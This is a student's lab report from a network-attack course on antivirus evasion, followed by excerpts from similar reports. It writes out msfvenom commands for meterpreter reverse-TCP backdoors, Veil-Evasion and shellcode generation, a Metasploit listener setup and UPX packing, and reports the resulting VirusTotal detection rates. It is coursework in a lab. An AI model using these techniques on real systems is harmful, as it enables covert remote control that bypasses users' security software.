Exp3 免杀原理与实践 20154301仉鑫烨

20154301 Exp3 免杀原理与实践

仉鑫烨

一、 实践内容

  1. 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;
  2. 通过组合应用各种技术实现恶意代码免杀;
  3. 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。

二、 基础问题

  1. 杀软是如何检测出恶意代码的?

    答:①基于特征码检测;如果一个可执行文件包含一段特征码则被认为是恶意代码,过时的特征码库就是没有用的,因此杀毒软件的更新很重要。②启发式恶意软件检测;如果一个软件干的事通常是恶意软件才会干的,就可从中得到启发,把它看做是恶意软件。

    ③基于行为的恶意软件检测;相当于是启发式的一种,或者是加入了行为监控的启发式。

  2. 免杀是做什么?

    答:免杀就是通过处理恶意软件好让其不被杀毒软件检测出来。

  3. 免杀的基本方法有哪些?

    答:①改变特征码;若只有EXE可以通过加壳,包括压缩壳和加密壳来改变特征码。若有shellcode可以用encodde进行编码或者基于payload重新编译生成可执行文件(这次实践尝试过这种方法)。若有源代码,可用其他语言进行重新再编译(veil-evasion)。

    ②改变行为;通讯方式尽量使用反弹式连接、隧道技术或者加密通讯数据。操作模式最好基于内存操作,减少对系统的修改,加入混淆作用的正常功能代码。③非常规方法;使用社工类攻击,诱骗目标关闭软件。

三、实验过程

1. msf编码器

本机IP:192.168.108.131

Linux的IP:192.168.108.128

  • 将上此实验产生的后门 zxy_backdoor.exe 文件直接拷贝到开启360的win主机下,被360直接查杀。

  • 添加信任以后放在 www.virustotal.com 上扫描。得出有52/66的杀毒软件报出病毒。
  • 尝试对木马进行编码,第一次编码文件命名为++zxy_backdoor_v1_1.exe++。检测结果为49/66。报毒率略有下降。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -b ’\x00’ LHOST=192.168.108.128 LPORT=4301 -f exe > zxy_backdoor_v1_1.exe

  • 编码十次结果为++zxy_backdoor_v1_10.exe++

  • www.virustotal.com检测结果与第一次编码结果相同,49/66。
2. veil-evasion
  • 首先安装veil(时间巨长!!)

sudo apt-get install veil-evasion

  • 安装完成后,用

    use evasion

    命令进入Evil-Evasion

    并输入use python/meterpreter/rev_tcp.py

  • 选择一个模板生成payload,我选择的是C语言,“c/meterpreter/rev_tcp”。

`set LHOST 192.168.108.128

set LPORT 4301

generate`

生成exe文件

  • 报毒率为29/66,有显著下降。

3. C语言调用Shellcode
  • 在Kali下生成一个C语言格式的shellcode数组,回连的IP为Kali的IP,端口自定。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.128 LPORT=4301 -f c

(应老师要求代码不写出)

  • 在linux下进入MSF打开监听进程,跟之前做的实验步骤一样,这时候在win10下运行之前的c文件,这时候linux就轻易的侵入了我的电脑
  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:use exploit/multi/handler set payload windows/meterpreter/reverse_tcp
  • 设置完成后,执行监听
  • 打开Windows上的后门程序:4301.exe
  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell,回连成功。
  • 查杀效果25/66
4. 加壳
  • 直接用upx将之前生成的c.exe文件加壳,改个文件名
  • 加壳后结果23/66.可以看到一定的效果!!

四、离实战还缺些什么技术或步骤

  • 文件伪装性不强,易被发现,应在后台自动运行且不显示。另外我们可以获得一个稳定的ip去监听靶机,避免被追踪?

五、实验体会

  • 本次实验操作较为简单,但准备工作比较复杂,安装veil时消耗时间极多。另外在编译c语言文件时,由于基础比较薄弱,消耗了一定的时间,后查阅同学资料才将将完成。本次最终完成的免杀程序较为基础,可以见到,还有23个杀毒软件能够检测出来,可见我们与专业人士的差距。另....我的360在本次实验中表现极为差劲,我准备换一个了!

原文地址:https://www.cnblogs.com/z20154301/p/8735439.html

时间: 2024-11-12 19:41:04

Exp3 免杀原理与实践 20154301仉鑫烨的相关文章

Exp3 免杀原理与实践

Exp3 免杀原理与实践 这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课.另一方面我也想看看metasploit在这场猫鼠游戏中能不能走在安全厂商的前面. 这次的目标免杀平台是64位windows 7 SP1,我用的windows 7 SP1虚拟机中事先装了一下杀毒软件: 火绒 版本:4.0.55.0 360安全卫士 版本:11.4.0.2002 -- 必须连上互联网才能正常工作 在线检测: Virustotal (www.virustotal.com) Virs

网络对抗 Exp3 免杀原理与实践 20154311 王卓然

Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的?  ①基于特征码的检测:AV软件厂商通过检测一个可执行文件是否包含一段与特征码库中相匹配的特征码从而判断是否为恶意软件.  ②启发式恶意软件检测:就是根据一个程序的特征和行为如果与恶意软件相似,就判定为恶意软件. ③基于行为的恶意软件检测:同启发式,启发式偏向于对程序的特征扫描,基于行为的则是多了对程序的行为监控. (2)免杀是做什么? 免杀就是使恶意软件能不被AV软件的检测出来,其本身安装的后门能够不被发现,成功存活

2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践

2017-2018-4 20155317<网络对抗技术>EXP3 免杀原理与实践 一.问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 首先尝试一下自己上个实验做出的后门程序 果然是不堪一击...拿去检测一下 装上veil尝试一下结果会如何 : 温馨提示一下,刚开始我是用的自己装的64的ka

2017-2018-2 《网络对抗技术》 20155322 Exp3 免杀原理与实践

#2017-2018-2 <网络对抗技术> 20155322 Exp3 免杀原理与实践 [-= 博客目录 =-] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-正确使用msf编码器 2.2-veil-evasion 2.3-组合应用技术实现免杀 2.4-靶机实测 2.5-基础问题回答 3-资料 1-实践目标 1.1-实践介绍:免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件

20154307《网络对抗》Exp3 免杀原理与实践

20154307<网络对抗>Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件. 启发式恶意软件检测 基于行为的恶意软件检测:检测程序是否会有一些恶意行为,如修改注册表,更改权限等等.. (2)免杀是做什么? 让攻击程序不被杀软查杀 (3)免杀的基本方法有哪些? 加壳 改变特征码 二.实践内容 1.使用msf生成后门程序的检测 由于上一个实验我们已经用msf生成了一

Exp3 免杀原理与实践20154302薛师凡

Exp3 免杀原理与实践20154302薛师凡 一.实践目标与内容 利用多种工具实现实现恶意代码免杀 在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功. 在保证后门程序功能的情况下实现杀软共存. 二.实践过程与步骤 1.使用msf编码器生成的后门程序 上次实践生成的后门程序,直接被360发现了,在virscan网站扫描,也有17个杀毒引擎识别了出来,很容易被辨识出来的. 2.使用veil-evasion生成的后门程序 2.1安装veil平台 apt-get install veil-

20155218《网络对抗》Exp3 免杀原理与实践

20155218<网络对抗>Exp3 免杀原理与实践 一.使用msf生成后门程序的检测 (1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下: (2)使用msf时对它多编码1次并进行测试 发现能发现的杀软变少: (3)使用msf时对它多编码10次并进行测试 编码10次后,发现可以查杀的杀软数量仅仅减少了一个: 二.使用veil-evasion生成后门程序的检测 通过list查看功能,选用22命令 生成文件: 测试结果: 显而易见,效果并不理想: 三.利用shellco

20155232《网络对抗》Exp3 免杀原理与实践

20155232<网络对抗>Exp3 免杀原理与实践 问题回答 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据. 如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. 启发式恶意软件检测 根据些片面特征去推断. 通用性,不精确. 基于行为的恶意软件检测 修改文件硬盘.连接恶意网站.修改注册表 (2)免杀是做什么? 通过一些手段来瞒过杀软的检测扫描.避免被杀毒软件查杀. (3)免杀的基本方法有哪些? 改变特征

20155202张旭 Exp3 免杀原理与实践

20155202张旭 Exp3 免杀原理与实践 AV厂商检测恶意软件的方式主流的就三种: 基于特征码的检测 启发式恶意软件检测 基于行为的恶意软件检测 我们要做的就是让我们的恶意软件没法被这三种方式找到,也就是免杀.具体的手段有: 改变特征码 依靠分片等方法尝试找出特征码区域,并对该区域代码进行编码 加壳,使其无法进行逆向,比对病毒库中的特征码 改变行为方式: 如果你手里只有EXE 有shellcode(像Meterpreter) 有源代码 改变行为 通讯方式 操作模式 例如之前注入所用到的反弹